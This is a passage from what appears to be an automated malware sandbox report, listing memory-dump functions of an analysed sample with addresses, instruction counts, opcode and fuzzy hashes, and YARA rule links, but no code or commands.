                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F59D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1378638983-0
                                                                                                                                                                                                                    • Opcode ID: acdc6111d40dcb5fa53f9e6e0a5ab81a285c49745ca52969b64f917c026243cd
                                                                                                                                                                                                                    • Instruction ID: 61333948c73a28b864b9586c82c966151afc0d9121498a3e588b808aa2865446
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acdc6111d40dcb5fa53f9e6e0a5ab81a285c49745ca52969b64f917c026243cd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B11F2B5800209DFDB10CF99D589BDEBBF8EB48324F24844AD955B7701C374AA49CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BDD3D8, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467691232.0000000000BDD000.00000040.00000001.sdmp, Offset: 00BDD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e8a39a515d1e31bcc04e8abf8785939c807feb373f9a39ec24b7822b28a2dbd0
                                                                                                                                                                                                                    • Instruction ID: c8738dbea615d527c93cd63c84ebdb26c287339f56f15bf83fcbd1b9655f6914
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8a39a515d1e31bcc04e8abf8785939c807feb373f9a39ec24b7822b28a2dbd0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E214871104200DFCB05CF10C8C0B17FBA5FB98324F20C5AAD8490B346D33AE856CBA2
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BDD4C4, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467691232.0000000000BDD000.00000040.00000001.sdmp, Offset: 00BDD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9c3742a8b66550773142d94e7f30187004144a574248a8790799030fdb2eda5b
                                                                                                                                                                                                                    • Instruction ID: e2798cb0ebb915747656012aca79f79d1194e9f5b982f20f79a2eaed314a326a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c3742a8b66550773142d94e7f30187004144a574248a8790799030fdb2eda5b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F821F171504240DFDB15DF14E8C0B2AFFA5FB9832CF2485AAE8450B346D33AD856DBA2
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BFD01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467887146.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3d4a202316c3bb011134a14e662a9982e9d6ac710666234d140e39fb95c14ef8
                                                                                                                                                                                                                    • Instruction ID: f22b49303aecf6c7b045476159cfb25c0e4ca49226bef38f2ad699674acb564a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d4a202316c3bb011134a14e662a9982e9d6ac710666234d140e39fb95c14ef8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3213771504208DFCB14DF24D8D4B26BBA6FB84314F20C9A9DA094B346CB3AD85BCB62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BFD1D4, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467887146.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 65829ee0f813f7ef82e882c7d1ea6bc047d291b70cfaad5fdce3fedefbb7ae4b
                                                                                                                                                                                                                    • Instruction ID: 9bec8e6f48f8ecdff5f6059ffdf7123ef75a01cf3cef93aec8fde50c6ef2d77d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65829ee0f813f7ef82e882c7d1ea6bc047d291b70cfaad5fdce3fedefbb7ae4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51213771504208DFDB01CF14C9C0B26BBE6FB84314F20C9ADDA094B242C73AD84ACAA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BFD006, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467887146.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 784f2039d674eacb97d83e89e54bf3692e66f4852a899ae46e9fccd6fc905432
                                                                                                                                                                                                                    • Instruction ID: 6a65a2a4824841f447bc12288b42901c36e0e7f6a1a2b74a28dd351b6986d895
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 784f2039d674eacb97d83e89e54bf3692e66f4852a899ae46e9fccd6fc905432
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6321C675509384CFCB12CF20D5A4B15BFB2EB45314F28C5EAD8498B697C33AD84ACB62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BDD4BF, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467691232.0000000000BDD000.00000040.00000001.sdmp, Offset: 00BDD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
                                                                                                                                                                                                                    • Instruction ID: 1568cca2b639c859cd303c2d297b7184a4ba6ea3af8a44ef8241d11c7a8ff006
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF119D76504280DFCB16CF10D5C4B16BFA1FB94328F2486AAD8450B656C336D85ACBA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BDD3D3, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467691232.0000000000BDD000.00000040.00000001.sdmp, Offset: 00BDD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
                                                                                                                                                                                                                    • Instruction ID: e233827df3b1426cf007c5395fa69ea87caba9bd0367a576009949ff447d7961
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81119D76504280DFCB16CF10D5C4B16BFA1FB94324F2486AAD8490B756C33AE85ACBA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00BFD1CF, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.467887146.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9c1c4d15945f75f5c7145bd3be0d7b4ff171933bea9630414cfd87ddfd5d3604
                                                                                                                                                                                                                    • Instruction ID: 2b44115a91e43dc0dbd919576a4c009d01753c08ce9160bc87188035e9515a7f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c1c4d15945f75f5c7145bd3be0d7b4ff171933bea9630414cfd87ddfd5d3604
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3118B75504284DFCB12CF10D5C4B25FBA2FB84324F28C6AAD9494B656C33AD85ACBA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions